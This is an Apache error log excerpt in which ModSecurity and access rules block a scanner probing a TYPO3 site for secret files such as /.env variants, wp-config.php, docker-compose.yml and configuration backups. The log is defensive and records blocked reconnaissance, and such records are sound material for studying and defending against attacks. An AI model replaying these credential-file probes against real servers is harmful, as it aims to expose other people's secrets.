[Wed Aug 06 03:32:49.046592 2025] [:error] [pid 1739941] [client 213.209.143.116:43434] [client 213.209.143.116] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJKwwQfN7XRSOYx3P0MdbwAAAAU"]
[Wed Aug 06 04:45:48.010006 2025] [authz_core:error] [pid 1739922] [client 18.221.166.29:38926] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Aug 06 09:30:52.541743 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJMErFJbmk9kSAGhb9lIzwAAAAM"]
[Wed Aug 06 09:30:52.542030 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJMErFJbmk9kSAGhb9lIzwAAAAM"]
[Wed Aug 06 09:30:52.542221 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJMErFJbmk9kSAGhb9lIzwAAAAM"]
[Wed Aug 06 09:30:52.602745 2025] [authz_core:error] [pid 1739925] [client 185.177.72.236:35632] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.yml
[Wed Aug 06 09:30:52.625349 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aJMErFJbmk9kSAGhb9lI0gAAAAM"]
[Wed Aug 06 09:30:52.625574 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aJMErFJbmk9kSAGhb9lI0gAAAAM"]
[Wed Aug 06 09:30:52.625723 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aJMErFJbmk9kSAGhb9lI0gAAAAM"]
[Wed Aug 06 09:30:52.647970 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aJMErFJbmk9kSAGhb9lI0wAAAAM"]
[Wed Aug 06 09:30:52.648201 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aJMErFJbmk9kSAGhb9lI0wAAAAM"]
[Wed Aug 06 09:30:52.648378 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aJMErFJbmk9kSAGhb9lI0wAAAAM"]
[Wed Aug 06 09:30:52.670597 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aJMErFJbmk9kSAGhb9lI1AAAAAM"]
[Wed Aug 06 09:30:52.670860 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aJMErFJbmk9kSAGhb9lI1AAAAAM"]
[Wed Aug 06 09:30:52.671025 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aJMErFJbmk9kSAGhb9lI1AAAAAM"]
[Wed Aug 06 09:30:52.770900 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aJMErFJbmk9kSAGhb9lI1wAAAAM"]
[Wed Aug 06 09:30:52.771140 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aJMErFJbmk9kSAGhb9lI1wAAAAM"]
[Wed Aug 06 09:30:52.771315 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aJMErFJbmk9kSAGhb9lI1wAAAAM"]
[Wed Aug 06 09:30:52.911599 2025] [authz_core:error] [pid 1739925] [client 185.177.72.236:35632] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-content
[Wed Aug 06 09:30:53.140749 2025] [authz_core:error] [pid 1739925] [client 185.177.72.236:35632] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app.yaml
[Wed Aug 06 09:30:53.237788 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mail/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aJMErVJbmk9kSAGhb9lI4QAAAAM"]
[Wed Aug 06 09:30:53.238032 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aJMErVJbmk9kSAGhb9lI4QAAAAM"]
[Wed Aug 06 09:30:53.238193 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aJMErVJbmk9kSAGhb9lI4QAAAAM"]
[Wed Aug 06 09:30:53.260675 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env1"] [unique_id "aJMErVJbmk9kSAGhb9lI4gAAAAM"]
[Wed Aug 06 09:30:53.260918 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env1"] [unique_id "aJMErVJbmk9kSAGhb9lI4gAAAAM"]
[Wed Aug 06 09:30:53.261098 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env1"] [unique_id "aJMErVJbmk9kSAGhb9lI4gAAAAM"]
[Wed Aug 06 09:30:53.321805 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aJMErVJbmk9kSAGhb9lI5AAAAAM"]
[Wed Aug 06 09:30:53.322056 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aJMErVJbmk9kSAGhb9lI5AAAAAM"]
[Wed Aug 06 09:30:53.322231 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "aJMErVJbmk9kSAGhb9lI5AAAAAM"]
[Wed Aug 06 09:30:53.344376 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aJMErVJbmk9kSAGhb9lI5QAAAAM"]
[Wed Aug 06 09:30:53.344597 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aJMErVJbmk9kSAGhb9lI5QAAAAM"]
[Wed Aug 06 09:30:53.344765 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aJMErVJbmk9kSAGhb9lI5QAAAAM"]
[Wed Aug 06 09:30:53.366987 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aJMErVJbmk9kSAGhb9lI5gAAAAM"]
[Wed Aug 06 09:30:53.367196 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aJMErVJbmk9kSAGhb9lI5gAAAAM"]
[Wed Aug 06 09:30:53.367366 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aJMErVJbmk9kSAGhb9lI5gAAAAM"]
[Wed Aug 06 09:30:53.504736 2025] [authz_core:error] [pid 1739925] [client 185.177.72.236:35632] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/logs
[Wed Aug 06 09:30:53.527416 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/src/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/src/.env"] [unique_id "aJMErVJbmk9kSAGhb9lI6wAAAAM"]
[Wed Aug 06 09:30:53.527647 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/src/.env"] [unique_id "aJMErVJbmk9kSAGhb9lI6wAAAAM"]
[Wed Aug 06 09:30:53.527844 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/src/.env"] [unique_id "aJMErVJbmk9kSAGhb9lI6wAAAAM"]
[Wed Aug 06 09:30:53.588491 2025] [authz_core:error] [pid 1739925] [client 185.177.72.236:35632] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/configuration.php.bak
[Wed Aug 06 09:30:53.649107 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aJMErVJbmk9kSAGhb9lI7wAAAAM"]
[Wed Aug 06 09:30:53.649342 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aJMErVJbmk9kSAGhb9lI7wAAAAM"]
[Wed Aug 06 09:30:53.649511 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aJMErVJbmk9kSAGhb9lI7wAAAAM"]
[Wed Aug 06 09:30:53.671658 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /platform/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/platform/.env"] [unique_id "aJMErVJbmk9kSAGhb9lI8AAAAAM"]
[Wed Aug 06 09:30:53.671864 2025] [:error] [pid 1739925] [client 185.177.72.236:35632] [client 185.177.72.236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/platform/.env"] [unique_id "aJMErVJbmk9kSAGhb9lI8AAAAAM"]
